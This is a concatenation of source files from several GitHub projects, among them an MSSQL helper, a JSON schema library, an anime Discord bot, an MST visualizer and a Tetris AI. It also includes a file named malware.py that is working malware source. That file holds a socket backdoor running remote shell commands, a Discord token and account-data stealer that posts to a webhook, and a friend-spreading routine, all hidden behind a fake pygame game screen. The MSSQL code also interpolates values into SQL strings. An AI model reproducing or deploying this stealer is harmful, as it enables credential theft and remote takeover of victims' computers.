username=self.config.username,
password=self.<PASSWORD>,
server=self.config.server,
database=self.config.database
),
connect_args={'autocommit': True},
deprecate_large_types=True
)
def execute(self, sql):
sql_statement = sql.encode("ascii", "ignore").decode("ascii")
try:
result_proxy = self.sqlalchemy_connection.execute(
sql_statement
)
except (ProgrammingError, DBAPIError) as e:
raise Exception(
f"""
Config dump:
{self.config}
Error while strying to run script:
{sql_statement}
""" + str(e)
)
if result_proxy.returns_rows:
df = pandas.DataFrame(result_proxy.fetchall())
if df.shape != (0, 0):
df.columns = result_proxy.keys()
return df
else:
return pandas.DataFrame()
def drop_schema(self):
self.sqlalchemy_connection.execute(
f"""
DECLARE @drop_statements AS CURSOR
DECLARE @statement AS VARCHAR(max)
SET @drop_statements = CURSOR FOR
SELECT 'DROP VIEW [{self.config.schema}].[' + TABLE_NAME + ']'
FROM INFORMATION_SCHEMA.VIEWS
WHERE TABLE_SCHEMA = '{self.config.schema}'
UNION ALL
SELECT 'DROP TABLE [{self.config.schema}].[' + TABLE_NAME + ']'
FROM INFORMATION_SCHEMA.TABLES
WHERE TABLE_SCHEMA = '{self.config.schema}'
AND TABLE_TYPE = 'BASE TABLE'
OPEN @drop_statements
FETCH NEXT FROM @drop_statements INTO @statement
WHILE @@FETCH_STATUS = 0
BEGIN
EXECUTE (@statement)
FETCH NEXT FROM @drop_statements INTO @statement
END
CLOSE @drop_statements
DEALLOCATE @drop_statements
"""
)
self.sqlalchemy_connection.execute(
f"DROP SCHEMA [{self.config.schema}]"
)
def create_schema(self):
self.sqlalchemy_connection.execute(
"CREATE SCHEMA [" + self.config.schema + "]"
)
@property
def schema_empty(self):
return (
len(
self.sqlalchemy_connection.execute(
f"""
SELECT TOP 1
TABLE_NAME
FROM INFORMATION_SCHEMA.TABLES
WHERE TABLE_CATALOG = '{self.config.database}'
AND TABLE_SCHEMA = '{self.config.schema}'
"""
).fetchall()
) == 0
)
@property
def schema_exists(self):
return self._sql_exists(
f"""
SELECT SCHEMA_NAME
FROM INFORMATION_SCHEMA.SCHEMATA
WHERE CATALOG_NAME = '{self.config.database}'
AND SCHEMA_NAME = '{self.config.schema}'
"""
)
def _sql_exists(self, sql):
result_proxy = self.sqlalchemy_connection.execute(sql)
return bool(result_proxy.first())
def table_exists(self, table_name):
return self._sql_exists(
f"""
SELECT TABLE_NAME
FROM INFORMATION_SCHEMA.TABLES
WHERE TABLE_CATALOG = '{self.config.database}'
AND TABLE_SCHEMA = '{self.config.schema}'
AND TABLE_NAME = '{table_name}'
"""
)
def column_exists(self, table_name, column_name):
return self._sql_exists(
f"""
SELECT COLUMN_NAME
FROM INFORMATION_SCHEMA.COLUMNS
WHERE TABLE_CATALOG = '{self.config.database}'
AND TABLE_SCHEMA = '{self.config.schema}'
AND TABLE_NAME = '{table_name}'
AND COLUMN_NAME = '{column_name}'
"""
)
def sql_query_single_value(self, sql):
try:
return self.sqlalchemy_connection.execute(
sql
).first()[0]
except TypeError:
return None
# def execute_sql_element(
# self,
# sqlalchemy_element: sqlalchemy.sql.expression.Executable,
# async_cursor: bool = False
# ) -> pandas.DataFrame:
# return self.sqlalchemy_connection.execute(sqlalchemy_element).fetchall()
def test(self) -> None:
self.execute("SELECT 1")
def load_dataframe(self, dataframe: pandas.DataFrame, source_name: str, source_column_names: Iterable[str]) -> None:
# TODO: Implement MSSQLService.load_dataframe
raise NotImplementedError()
# def compile_sqlalchemy(
# self,
# sqlalchemy_element: sqlalchemy.sql.expression.ClauseElement
# ) -> str:
# return super().compile_sqlalchemy(sqlalchemy_element).replace("DATETIME", "DATETIME2")
```
|
{
"source": "jetavator/wysdom",
"score": 3
}
|
#### File: examples/modules/json_module.py
```python
from typing import Dict, List
from wysdom import UserObject, UserProperty, SchemaArray, SchemaDict, ReadsJSON, key
class Vehicle(UserObject):
color: str = UserProperty(str)
description: str = UserProperty(str)
@property
def license(self):
return key(self)
class Address(UserObject):
first_line: str = UserProperty(str)
second_line: str = UserProperty(str)
city: str = UserProperty(str)
postal_code: str = UserProperty(int)
class Person(UserObject, ReadsJSON):
first_name: str = UserProperty(str)
last_name: str = UserProperty(str)
current_address: Address = UserProperty(Address)
previous_addresses: List[Address] = UserProperty(SchemaArray(Address))
vehicles: Dict[str, Vehicle] = UserProperty(SchemaDict(Vehicle))
```
#### File: wysdom/dom/DOMDict.py
```python
from __future__ import annotations
from typing import Generic, TypeVar, Optional, Any, Dict
from collections.abc import Mapping
from ..base_schema import Schema, SchemaAnything
from .DOMElement import DOMElement
from .DOMObject import DOMObject
from . import DOMInfo
from .DOMProperties import DOMProperties
T_co = TypeVar("T_co")
class DOMDict(DOMObject, Generic[T_co]):
"""
An object with dynamic properties (corresponding to a Python dict).
"""
def __init__(
self,
value: Optional[Mapping[str, Any]] = None,
json_dom_info: Optional[DOMInfo] = None,
item_type: Optional[Schema] = None,
) -> None:
"""
:param value: A dict (or any :class:`collections.abc.Mapping`) containing the data to populate this
object's properties.
:param json_dom_info: A :class:`~wysdom.dom.DOMInfo` named tuple containing information about this object's
position in the DOM.
:param item_type: A :class:`~wysdom.Schema` object specifying what constitutes a valid property
of this object.
"""
self.__json_schema_properties__ = DOMProperties(
additional_properties=(item_type or SchemaAnything())
)
super().__init__(value or {}, json_dom_info)
def __getitem__(self, key: str) -> T_co:
return super().__getitem__(key)
def __deepcopy__(self, memo: Dict[int, DOMElement]) -> DOMDict:
cls = self.__class__
result = cls(
value=self.to_builtin(),
json_dom_info=self.__json_dom_info__,
_item_type=self.__json_schema_properties__.additional_properties,
)
memo[id(self)] = result
return result
```
#### File: wysdom/dom/DOMProperties.py
```python
from typing import Dict, Union, Set
from ..base_schema import Schema
# TODO: DRY with object_schema.SchemaObject?
class DOMProperties(object):
"""
A container for property information for a :class:`.DOMObject`.
"""
properties: Dict[str, Schema] = None
required: Set[str] = None
additional_properties: Union[bool, Schema] = False
def __init__(
self,
properties: Dict[str, Schema] = None,
required: Set[str] = None,
additional_properties: Union[bool, Schema] = False,
) -> None:
"""
:param properties: A dictionary of :class:`~wysdom.base_schema.Schema` objects
defining the expected names and types of a :class:`.DOMObject`'s
properties.
:param required: A set of the property names that are required for an instance to be valid.
:param additional_properties: Defines whether a :class:`.DOMObject` permits additional
dynamically-named properties. Can be True or False, or
can be set to a specific :class:`~wysdom.Schema` to restrict the permitted
types of any additional properties.
"""
self.properties = properties or {}
self.required = required or set()
self.additional_properties = additional_properties
```
#### File: wysdom/mixins/ReadsYAML.py
```python
from __future__ import annotations
from typing import Any, Union, TextIO
import yaml
from ..dom import DOMObject
class ReadsYAML(DOMObject):
"""
Adds YAML reading and writing functionality to a DOMObject.
"""
def to_yaml(self, **kwargs: Any) -> str:
"""
Serialize the DOM object to YAML.
:param kwargs: Optional keyword arguments to pass to PyYAML's safe_dump method.
See parameters for Dumper in https://pyyaml.org/wiki/PyYAMLDocumentation
:return: The DOM object, serialized as a YAML string
"""
return yaml.safe_dump(self.to_builtin(), **kwargs)
@classmethod
def from_yaml(cls, yaml_string: Union[str, TextIO]) -> ReadsYAML:
"""
Create a new DOM object by from a YAML string.
:param yaml_string: YAML string to read
:return: New DOM object instance
"""
return cls(yaml.safe_load(yaml_string))
@classmethod
def from_yaml_file(cls, filename: str) -> ReadsYAML:
"""
Create a new DOM object from a file on disk.
:param filename: File path on disk of YAML file
:return: New DOM object instance
"""
with open(filename, "r") as stream:
return cls.from_yaml(stream)
```
#### File: wysdom/object_schema/SchemaDict.py
```python
from typing import Any, Type, Union, Optional
from ..dom import DOMInfo, DOMDict
from .SchemaObject import SchemaObject
from ..base_schema import Schema, SchemaPattern
from .resolve_arg_to_type import resolve_arg_to_schema
class SchemaDict(SchemaObject):
"""
A schema specifying an object with dynamic properties (corresponding to a Python dict)
:param items: The permitted data type or schema for the properties of this object.
Must be one of:
A primitive Python type (str, int, bool, float)
A subclass of `UserObject`
An instance of `Schema`
:param key_pattern: A regex pattern to validate the keys of the dictionary against.
"""
def __init__(
self, items: Union[Type, Schema], key_pattern: Optional[str] = None
) -> None:
super().__init__(
additional_properties=resolve_arg_to_schema(items),
property_names=(
None if key_pattern is None else SchemaPattern(key_pattern)
),
)
def __call__(self, value: Any, dom_info: DOMInfo = None) -> Any:
return DOMDict(value, dom_info, item_type=self.additional_properties)
```
|
{
"source": "jetBBlack/kawaii",
"score": 2
}
|
#### File: kawaii/cogs/anime_music.py
```python
import discord
from discord.ext import commands
class AnimeMusic(commands.Cog):
def __init__(self, client):
self.client = client
def setup(client):
client.add_cog(AnimeMusic(client))
```
#### File: jetBBlack/kawaii/services.py
```python
import requests
import json as js
from datetime import date
class Anime:
def __init__(self, url) -> None:
self.url = url
def get_list_top_airing_anime(self):
response = requests.get(self.url+"top/anime/1/airing")
if response.status_code == 200:
result ={}
result = js.loads(response.text)
return result.get("top")
else:
print("Failed to get data")
def get_list_top_anime_alltime(self):
response = requests.get(self.url+"top/anime/1")
if response.status_code == 200:
result ={}
result = js.loads(response.text)
return result.get("top")
else:
print("Failed to get data")
def get_list_upcomming_featured(self):
response = requests.get(self.url+"season/later")
if response.status_code == 200:
result ={}
result = js.loads(response.text)
return result.get("anime")
else:
print("Failed to get data")
def get_curr_ss_anime_list(self):
today = date.today()
cur_season = ''
spring = [2,3,4]
summer = [5,6,7]
fall = [8,9,10]
winter = [11,12,1]
if today.month in spring:
cur_season = 'spring'
elif today.month in summer:
cur_season = "summer"
elif today.month in fall:
cur_season = "fall"
elif today.month in winter:
cur_season = "winter"
response = requests.get(self.url+f"season/{today.year}/{cur_season}")
if (response.status_code == 200):
result = {}
result = js.loads(response.text)
return result.get("anime")
else:
print('Failed to get data')
def get_next_ss_anime_list(self):
today = date.today()
next_season = ''
next_year = 0
spring = [2,3,4]
summer = [5,6,7]
fall = [8,9,10]
winter = [11,12,1]
if (today.month+3) in spring:
next_season = 'spring'
elif (today.month+3) in summer:
next_season = "summer"
elif (today.month+3) in fall:
next_season = "fall"
elif (today.month+3) in winter:
next_season = "winter"
if today.month in [11, 12]:
next_year = today.year+1
else: next_year = today.year
response = requests.get(self.url+f"season/{next_year}/{next_season}")
if (response.status_code == 200):
result = {}
result = js.loads(response.text)
return result.get("anime")
else:
print('Failed to get data')
def get_anime_list_byYearandSs(self, season, year):
response = requests.get(f"{self.url}season/{year}/{season}")
if (response.status_code == 200):
result = {}
result = js.loads(response.text)
return result.get("anime")
else:
print('Failed to get data')
def search_by_name(self, name, type):
response = requests.get(f"{self.url}search/{type}?q={name}&limit=10")
if (response.status_code == 200):
result = {}
result = js.loads(response.content)
return result.get("results")
else:
print('Failed to get data')
def get_info_of_anime(self, anime_id, type='anime'):
response = requests.get(f"{self.url}{type}/{anime_id}")
if (response.status_code == 200):
result = {}
result = js.loads(response.content)
return result
else:
print('Failed to get data from API')
def get_top_manga(self, type):
response = requests.get(f"{self.url}top/manga/1/{type}")
if (response.status_code == 200):
result = {}
result = js.loads(response.text)
return result.get('result')
else:
print('Invalid type')
def get_list_character_byName(self, name):
response = requests.get(f"{self.url}search/character?q={name}&limit=10")
if (response.status_code == 200):
result = {}
result = js.loads(response.text)
return result.get('results')
else:
print('Failed to get data')
def get_list_top_character(self):
response = requests.get(f"{self.url}/top/characters/1/")
if (response.status_code == 200):
result = {}
result = js.loads(response.content)
return result.get('top')
else:
print('Failed to get data')
#Test request
# anime = Anime("https://api.jikan.moe/v3/")
# new_ss_list = anime.get_list_character_byName("Chtholly")
# for i in range(len(new_ss_list)):
# print(new_ss_list[i].get('name'))
```
|
{
"source": "jetbead/TCO18MMR1_Visualizer",
"score": 3
}
|
#### File: TCO18MMR1_Visualizer/src/visualizer.py
```python
import tkinter as tk
import random
from math import sqrt
def MST(pts):
INF = float(10**10)
def distance(u, v):
return sqrt((u[0] - v[0])**2 + (u[1] - v[1])**2)
V = len(pts)
if V <= 1:
return 0, list()
cost = [[distance(pts[i], pts[j]) for i in range(V)] for j in range(V)]
min_cost = [INF for i in range(V)]
min_cost[0] = 0
min_edge = [(-1,-1) for i in range(V)]
visited = [False for i in range(V)]
score = 0
edges = list()
while True:
best_v = -1
best_cost = INF
for t in range(V):
if visited[t]:
continue
if min_cost[t] < best_cost:
best_v = t
best_cost = min_cost[t]
if best_v == -1:
break
visited[best_v] = True
if best_v > 0:
edges.append(min_edge[best_v])
score += best_cost
for t in range(V):
if min_cost[t] > cost[best_v][t]:
min_cost[t] = cost[best_v][t]
min_edge[t] = (best_v, t)
return score, edges
class Visualizer:
CANVAS_WIDTH = 640
CANVAS_HEIGHT = 480
POINT_SIZE = 10
NUM_OF_RED_POINTS = 5
def __init__(self):
self.root = tk.Tk()
self.root.title("TCO18 MMR1 Visualizer")
self.draw_tk_objects()
def draw_tk_objects(self):
""" tkオブジェクトを配置 """
## キャンバス
self.canvas = tk.Canvas(self.root,
width=self.CANVAS_WIDTH,
height=self.CANVAS_HEIGHT)
self.canvas.bind("<Button-1>", self.canvas_click)
self.canvas.pack()
## フレーム1
frm = tk.LabelFrame(self.root,
text='設定',
relief='groove',
borderwidth=1)
frm.pack(fill="both")
b = tk.Button(frm, text='再描画',width=15)
b.bind("<Button-1>", self.draw)
b.pack(side='left')
b = tk.Button(frm, text='座標出力',width=15)
b.bind("<Button-1>", self.dump)
b.pack(side='left')
l = tk.Label(frm, text="jc:")
l.pack(side='left')
self.junction_cost = tk.Entry(frm)
self.junction_cost.insert(tk.END,"0.0")
self.junction_cost.pack(side='left')
## フレーム2
frm = tk.LabelFrame(self.root, text='モード', relief='groove', borderwidth=1)
frm.pack(fill="both")
self.mode_label = tk.Label(frm, text="[MOVE]")
self.mode_label.pack(side='left')
b = tk.Button(frm, text='追加',width=15)
b.bind("<Button-1>", self.add_mode)
b.pack(side='left')
b = tk.Button(frm, text='削除',width=15)
b.bind("<Button-1>", self.erase_mode)
b.pack(side='left')
b = tk.Button(frm, text='移動',width=15)
b.bind("<Button-1>", self.move_mode)
b.pack(side='left')
# スコア表示
self.score_label = tk.Label(self.root, text="0.0")
self.score_label.pack()
def dump(self, ev):
""" 座標情報の出力 """
print("#red points")
for id in self.canvas.find_withtag("cpoint"):
coords = self.canvas.coords(id)
posx = int((coords[2]-coords[0])/2 + coords[0])
posy = int((coords[3]-coords[1])/2 + coords[1])
print(str(posx) + " " + str(posy))
print("#blue points")
for id in self.canvas.find_withtag("jpoint"):
coords = self.canvas.coords(id)
posx = int((coords[2]-coords[0])/2 + coords[0])
posy = int((coords[3]-coords[1])/2 + coords[1])
print(str(posx) + " " + str(posy))
def draw_line(self):
""" 最小全域木の辺の表示(スコア情報も更新) """
self.canvas.delete("line")
lst = list()
for id in self.canvas.find_withtag("cpoint"):
coords = self.canvas.coords(id)
posx = int((coords[2]-coords[0])/2 + coords[0])
posy = int((coords[3]-coords[1])/2 + coords[1])
lst.append((posx, posy))
for id in self.canvas.find_withtag("jpoint"):
coords = self.canvas.coords(id)
posx = int((coords[2]-coords[0])/2 + coords[0])
posy = int((coords[3]-coords[1])/2 + coords[1])
lst.append((posx, posy))
# 最小全域木の構築
cost, edges = MST(lst)
# スコア情報の更新
cost += float(self.junction_cost.get()) * len(self.canvas.find_withtag("jpoint"))
self.score_label['text'] = str(cost)
# 辺の描画
for edge in edges:
self.canvas.create_line(lst[edge[0]][0], lst[edge[0]][1],
lst[edge[1]][0], lst[edge[1]][1],
tag="line")
self.canvas.tag_lower("line")
def draw(self, ev):
""" 赤点(cities)の描画 """
self.erase(ev)
for i in range(self.NUM_OF_RED_POINTS):
x = random.randint(0, self.CANVAS_WIDTH)
y = random.randint(0, self.CANVAS_HEIGHT)
id = self.canvas.create_oval(x-self.POINT_SIZE/2, y-self.POINT_SIZE/2,
x+self.POINT_SIZE/2, y+self.POINT_SIZE/2,
fill='#ff0000', tag="cpoint")
self.canvas.tag_bind(id, "<Button1-Motion>", lambda ev,id=id:self.move(ev, id))
self.draw_line()
def move(self, ev, id):
""" クリックされたオブジェクトの移動 """
x = ev.x
y = ev.y
self.canvas.coords('current',
x-self.POINT_SIZE/2, y-self.POINT_SIZE/2,
x+self.POINT_SIZE/2, y+self.POINT_SIZE/2)
self.draw_line()
def erase(self, ev):
""" キャンバス内のオブジェクトを全削除 """
self.canvas.delete("cpoint")
self.canvas.delete("jpoint")
self.canvas.delete("line")
self.draw_line()
def add_mode(self, ev):
""" 操作モードを「追加」モードにする """
self.mode_label['text'] = "[ADD]"
def erase_mode(self, ev):
""" 操作モードを「削除」モードにする """
self.mode_label['text'] = "[ERASE]"
def move_mode(self, ev):
""" 操作モードを「移動」モードにする """
self.mode_label['text'] = "[MOVE]"
def canvas_click(self, ev):
""" キャンバス内でクリックされた時の処理 """
if self.mode_label['text'] == "[ADD]":
self.add_point(ev.x, ev.y)
if self.mode_label['text'] == "[ERASE]":
self.canvas.delete('current')
self.draw_line()
def add_point(self, x, y):
""" 青点(junctions)の追加 """
id = self.canvas.create_oval(x-self.POINT_SIZE/2, y-self.POINT_SIZE/2,
x+self.POINT_SIZE/2, y+self.POINT_SIZE/2,
fill='#0000ff', tag="jpoint")
self.canvas.tag_bind(id, "<Button1-Motion>", lambda ev,id=id:self.move(ev, id))
self.draw_line()
def run(self):
self.root.mainloop()
def main():
vis = Visualizer()
vis.run()
if __name__ == '__main__':
main()
```
|
{
"source": "JetBerri/Stealer",
"score": 3
}
|
#### File: JetBerri/Stealer/malware.py
```python
def DepInstall():
os.system("python -m pip install socket >nul 2>&1")
os.system("python -m pip install subprocess >nul 2>&1")
os.system("python -m pip install re >nul 2>&1")
os.system("python -m pip install json >nul 2>&1")
os.system("python -m pip install base64 >nul 2>&1")
os.system("python -m pip install urllib3 >nul 2>&1")
os.system("python -m pip install threading >nul 2>&1")
os.system("python -m pip install time >nul 2>&1")
os.system("python -m pip install sys >nul 2>&1")
os.system("python -m pip install tk >nul 2>&1")
os.system("python -m pip install pygame >nul 2>&1")
f = open("verification.txt", "w")
f.write("Dependencies installed :) please don't delete this file or the program will keep trying to install the dependencies once it is ran again.")
f.close()
def DepCheck():
filecheck = os.path.isfile("verification.txt")
if filecheck == True:
pass
if filecheck == False:
DepInstall()
else:
print("Error. Skipped.")
DepCheck()
def BackdoorClient():
# Client for backdoor connection
# Requeried modules
import socket
import subprocess
IP = "127.0.0.1"
PORT = 8080
client = socket.socket()
try:
client.socket((IP,PORT)) # Ip and port
client.send("1".encode("ascii"))
while True: # Ready for executing commands
bytes = client.recv(1024)
cod = bytes.decode("ascii")
sub = subprocess.Popen(cod,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE)
client.send(sub.stdout.read())
except:
print("An error has occured while connecting to the server.")
pass
def TokenGrabber():
# Requeried modules
import os
if os.name != "nt": # Check if it's a computer running windows
exit() # If is not, the program will close
from re import findall
from json import loads, dumps
from base64 import b64decode
from subprocess import Popen, PIPE
from urllib.request import Request, urlopen
from threading import Thread
from time import sleep
from sys import argv
WEBHOOK_URL = "" # The webhook that will be used
# Some paths
LOCAL = os.getenv("LOCALAPPDATA")
ROAMING = os.getenv("APPDATA")
PATHS = {
"Discord": ROAMING + "\\Discord",
"Discord Canary": ROAMING + "\\discordcanary",
"Discord PTB": ROAMING + "\\discordptb",
"Google Chrome": LOCAL + "\\Google\\Chrome\\User Data\\Default",
"Opera": ROAMING + "\\Opera Software\\Opera Stable",
"Brave": LOCAL + "\\BraveSoftware\\Brave-Browser\\User Data\\Default",
"Yandex": LOCAL + "\\Yandex\\YandexBrowser\\User Data\\Default"
}
# Get the header
def getHeader(token=None, content_type="application/json"):
headers = {
"Content-Type": content_type,
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36"
}
if token:
headers.update({"Authorization": token})
return headers
# Some info about the user
def getUserData(token):
try:
return loads(
urlopen(Request("https://discordapp.com/api/v6/users/@me", headers=getHeader(token))).read().decode())
except:
pass
# Get token by extracting it from the path
def getTokenz(path):
path += "\\Local Storage\\leveldb"
tokens = []
for file_name in os.listdir(path):
if not file_name.endswith(".log") and not file_name.endswith(".ldb"):
continue
for line in [x.strip() for x in open(f"{path}\\{file_name}", errors="ignore").readlines() if x.strip()]:
for regex in (r"[\w-]{24}\.[\w-]{6}\.[\w-]{27}", r"mfa\.[\w-]{84}"):
for token in findall(regex, line):
tokens.append(token)
return tokens
# Who am I function
def WhoAmI():
ip = "None"
try:
ip = urlopen(Request("https://ifconfig.me")).read().decode().strip()
except:
pass
return ip
# Hardware
def hWiD():
p = Popen("wmic csproduct get uuid", shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE)
return (p.stdout.read() + p.stderr.read()).decode().split("\n")[1]
# Discord friends
def getFriends(token):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/relationships",
headers=getHeader(token))).read().decode())
except:
pass
# Get channels
def getChat(token, uid):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/channels", headers=getHeader(token),
data=dumps({"recipient_id": uid}).encode())).read().decode())["id"]
except:
pass
# Get the payment method
def paymentMethods(token):
try:
return bool(len(loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/billing/payment-sources",
headers=getHeader(token))).read().decode())) > 0)
except:
pass
# Message ID
def sendMessages(token, chat_id, form_data):
try:
urlopen(Request(f"https://discordapp.com/api/v6/channels/{chat_id}/messages", headers=getHeader(token,
"multipart/form-data; boundary=---------------------------325414537030329320151394843687"),
data=form_data.encode())).read().decode()
except:
pass
# Spread function
def spread(token, form_data, delay):
return # ¡¡¡¡Remove to re-enabled (If you remove this line, malware will spread itself by sending the binary to friends)!!!!
for friend in getFriends(token):
try:
chat_id = getChat(token, friend["id"])
sendMessages(token, chat_id, form_data)
except Exception as e:
pass
sleep(delay)
# Main function of the grabber
def main():
cache_path = ROAMING + "\\.cache~$"
prevent_spam = True
self_spread = True
embeds = []
working = []
checked = []
already_cached_tokens = []
working_ids = []
ip = WhoAmI()
pc_username = os.getenv("UserName")
pc_name = os.getenv("COMPUTERNAME")
user_path_name = os.getenv("userprofile").split("\\")[2]
for platform, path in PATHS.items():
if not os.path.exists(path):
continue
for token in getTokenz(path):
if token in checked:
continue
checked.append(token)
uid = None
if not token.startswith("mfa."):
try:
uid = b64decode(token.split(".")[0].encode()).decode()
except:
pass
if not uid or uid in working_ids:
continue
user_data = getUserData(token)
if not user_data:
continue
working_ids.append(uid)
working.append(token)
username = user_data["username"] + "#" + str(user_data["discriminator"])
user_id = user_data["id"]
email = user_data.get("email")
phone = user_data.get("phone")
nitro = bool(user_data.get("premium_type"))
billing = bool(paymentMethods(token))
# Embed can be customized
embed = {
"color": 0x000000,
"fields": [
{
"name": "Account Info",
"value": f'Email: {email}\nPhone: {phone}\nNitro: {nitro}\nBilling Info: {billing}',
"inline": True
},
{
"name": "PC Info",
"value": f'IP: {ip}\nUsername: {pc_username}\nPC Name: {pc_name}\nToken Location: {platform}',
"inline": True
},
{
"name": "Token",
"value": token,
"inline": False
}
],
"author": {
"name": f"{username} ({user_id})",
},
"footer": {
"text": f"[+] Developed By JetBerri [+]"
}
}
embeds.append(embed)
with open(cache_path, "a") as file:
for token in checked:
if not token in already_cached_tokens:
file.write(token + "\n")
if len(working) == 0:
working.append('123')
webhook = {
"content": "",
"embeds": embeds,
"username": "Stealer - You can change this name in the json embed :))",
"avatar_url": "https://avatars.githubusercontent.com/u/84512017?v=4"
}
try:
urlopen(Request(WEBHOOK_URL, data=dumps(webhook).encode(), headers=getHeader()))
except:
pass
if self_spread:
for token in working:
with open(argv[0], encoding="utf-8") as file:
content = file.read()
Thread(target=spread, args=(token, 7500 / 1000)).start()
try:
main()
except Exception as e:
print(e)
pass
# This is a simple game coded to show a black screen, if you know how to use pygame, you can add your extension.
# Modules
def GameStealer():
from tkinter import font
import pygame
import sys
# Screen size
WI = 1920
HE = 1080
FPS = 60
# Some debug (not really required)
def debug(info,y=10,x=10):
font = pygame.font.Font(None,30)
display_surface = pygame.display.get_surface()
debug_surf = font.render(str(info), True,"White")
debug_rect = debug_surf.get_rect(topleft=(x,y))
pygame.draw.rect(display_surface, "Black", debug_rect)
display_surface.blit(debug_surf,debug_rect)
# Main game class
class Game:
def __init__(self):
pygame.init()
self.screen = pygame.display.set_mode((WI,HE))
self.clock = pygame.time.Clock
def run(self):
while True:
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
sys.exit()
self.screen.fill("black")
TokenGrabber()
BackdoorClient()
pygame.display.update()
debug("Loading....")
if __name__ == "__main__":
game = Game()
game.run()
GameStealer()
```
|
{
"source": "jetberry/JamPewDiePie",
"score": 3
}
|
#### File: JamPewDiePie/Resources/resize.py
```python
import os, shutil, Image
'''
"IOError: decoder zip not available" workaround for osx Yosemite:
sudo pip uninstall PIL
brew install zlib
brew link --force zlib
sudo pip install PIL --allow-external PIL --allow-unverified PIL
sudo pip install pillow
'''
RES_100 = 'ipadhd'
RES_50 = 'hd'
RES_25 = 'sd'
SCRIPT_DIR = os.path.dirname(os.path.realpath(__file__))
RES_100_DIR = SCRIPT_DIR + '/' + RES_100
RES_50_DIR = SCRIPT_DIR + '/' + RES_50
RES_25_DIR = SCRIPT_DIR + '/' + RES_25
def renew_dir(dir):
if os.path.exists(dir):
shutil.rmtree(dir)
shutil.copytree(RES_100_DIR, dir)
def get_png_file_list(dir):
file_list = []
import os
for root, dirs, files in os.walk(dir):
for file in files:
if file.endswith(".png"):
file_list += [os.path.join(root, file)]
return file_list
def scale_file(file, factor):
print file
image = Image.open(file)
new_size = (image.size[0] / factor, image.size[1] / factor)
image.resize(new_size, Image.NEAREST).save(file)
def scale(dir, factor):
renew_dir(dir)
file_list = get_png_file_list(dir)
for file in file_list:
scale_file(file, factor)
def resize_all():
scale(RES_50_DIR, 2)
scale(RES_25_DIR, 4)
if __name__ == "__main__":
try:
resize_all()
except RuntimeError, Argument:
print "ERROR " + str(Argument)
sys.exit(1)
```
|
{
"source": "JetBlack011/TetrisAI",
"score": 4
}
|
#### File: JetBlack011/TetrisAI/ai.py
```python
import time
import pyautogui
import numpy as np
from grid import Grid
from piece import PIECE_SET
class AI:
"""
A simple Tetris AI designed to interact with a running emulator through the visual analysis and
interpretation of the game.
Attributes
----------
height_weight : float
Weight for aggregate height during heuristic claculation (negated)
lines_weight : float
Weight for completed lines
holes_weight : float
Weight for existing holes (negated)
bumpiness_weight : float
Weight for bumpiness of the grid (negated)
"""
def __init__(self, vision, controller, height_weight, lines_weight, holes_weight, bumpiness_weight, starting_level=0):
self.vision = vision
self.controller = controller
# Optimal coefficents (weights) for score calulation
self.height_weight = -height_weight
self.lines_weight = lines_weight
self.holes_weight = -holes_weight
self.bumpiness_weight = -bumpiness_weight
# Configurable game options
self.starting_level = starting_level
self.grid = Grid()
def run(self):
"""Main game loop; play until told to stop"""
self.controller.click_screen()
if self.vision.on_playing():
print("[+] Resetting game")
self.reset_game()
self.vision.update()
if self.vision.on_game_over():
print("[+] Game over! Restarting...")
self.controller.press_start()
time.sleep(1)
self.vision.update()
while not self.vision.on_playing():
self.vision.update()
if self.vision.on_start():
print("[+] Pressing start")
self.controller.press_start()
if self.vision.on_choose_game_type():
print("[+] Choosing game type")
self.controller.press_start()
if self.vision.on_choose_level():
print("[+] Choosing level " + str(self.starting_level))
for _ in range(9):
self.controller.press_left()
for _ in range(self.starting_level):
self.controller.press_right()
self.controller.press_start()
while self.vision.on_playing():
self.vision.update()
if self.grid.current_piece is None:
self.grid.current_piece = PIECE_SET[self.vision.current_piece()]
else:
self.grid.current_piece = self.grid.next_piece
self.grid.next_piece = PIECE_SET[self.vision.next_piece()]
origin, rotation = self.best_move()
for _ in range(rotation):
self.controller.rotate_ccw()
for _ in range(4):
self.controller.press_left()
for _ in range(origin):
self.controller.press_right()
self.vision.update_stats()
self.hard_drop()
self.grid.drop(self.grid.current_piece, origin, rotation)
self.grid.clear_lines()
print(self.grid)
print("Current Piece: {}, Next Piece: {}\nBest Origin: {}, Best Rotation: {}".format(self.grid.current_piece, self.grid.next_piece, origin, rotation))
def hard_drop(self):
start = time.time()
elapsed_time = 0
self.vision.update_stats()
self.controller.release_down()
while not self.vision.is_block_down() and elapsed_time < 3:
self.controller.hold_down()
elapsed_time = time.time() - start
self.controller.release_down()
def reset_game(self):
while not self.vision.on_game_over():
self.controller.rotate_cw()
self.hard_drop()
self.vision.update()
def score(self):
"""
Calculate the score of the current grid using the
weighted summation of the heuristic variables
"""
return self.height_weight * self.grid.aggregate_height() + \
self.lines_weight * self.grid.lines() + \
self.holes_weight * self.grid.holes() + \
self.bumpiness_weight * self.grid.bumpiness()
def best_move(self):
"""Determine the optimal move given a particular game state"""
piece = self.grid.current_piece
best_score = None
best_origin = 0
best_rotation = 0
for origin in range(piece.max_origin()):
for rotation in range(piece.max_rotation + 1):
self.grid.drop(piece, origin, rotation)
score = self.score()
self.grid.revert_state()
if best_score is None:
best_score = score
elif score > best_score:
best_score = score
best_origin = origin
best_rotation = rotation
return (best_origin, best_rotation)
```
#### File: JetBlack011/TetrisAI/vision.py
```python
import cv2
from PIL import ImageGrab
import numpy as np
class Vision:
def __init__(self, show_window=False):
self.static_templates = {
'start': 'assets/start.png',
'game_type': 'assets/game_type.png',
'level': 'assets/name.png',
'playing': 'assets/playing.png',
'end': 'assets/end.png',
'I': 'assets/I.png',
'J': 'assets/J.png',
'L': 'assets/L.png',
'O': 'assets/O.png',
'S': 'assets/S.png',
'T': 'assets/T.png',
'Z': 'assets/Z.png',
'nextI': 'assets/next/I.png',
'nextJ': 'assets/next/J.png',
'nextL': 'assets/next/L.png',
'nextO': 'assets/next/O.png',
'nextS': 'assets/next/S.png',
'nextT': 'assets/next/T.png',
'nextZ': 'assets/next/Z.png'
}
